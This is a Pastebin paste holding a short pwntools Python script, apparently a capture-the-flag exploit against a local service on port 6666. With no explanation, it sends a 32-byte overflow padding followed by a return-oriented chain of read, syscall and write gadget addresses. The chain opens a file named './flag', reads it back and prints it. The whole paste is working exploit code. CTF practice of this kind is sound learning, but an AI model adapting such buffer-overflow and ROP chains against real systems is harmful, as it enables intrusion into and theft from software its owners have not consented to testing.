Advertisement
Guest User

Untitled

a guest
Jul 30th, 2016
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1. from pwn import *
  2.  
  3. read = 0x0804811d
  4. buf1 = 0x08049100
  5. buf2 = 0x08049200
  6. start = 0x080480d8
  7. addesp30h = 0x080481b8
  8.  
  9. r = remote('127.0.0.1',6666)
  10.  
  11. raw_input('stop...')
  12.  
  13. padding = 'a'*32
  14. mov_ebcdx_int80h = 0x08048122
  15. write = 0x08048135
  16.  
  17. r.send(padding+p32(read)+p32(start)+p32(0)+p32(buf1)+p32(50))
  18. r.send('./flag\x00')
  19. r.send(padding+p32(start)+p32(0xdeadbeaf)+p32(mov_ebcdx_int80h)+p32(start)+p32(buf1))
  20. r.send(padding+p32(start)+'a'*16)
  21. r.send(padding+p32(start)+'a'*16)
  22. r.send(padding+p32(read)+p32(addesp30h)+p32(0)+p32(buf2)+p32(50))
  23. r.send('12345')
  24. r.send(padding+p32(read)+p32(start)+p32(7)+p32(buf2)+p32(50))
  25. r.send(padding+p32(write)+p32(start)+p32(1)+p32(buf2)+p32(50))
  26. r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement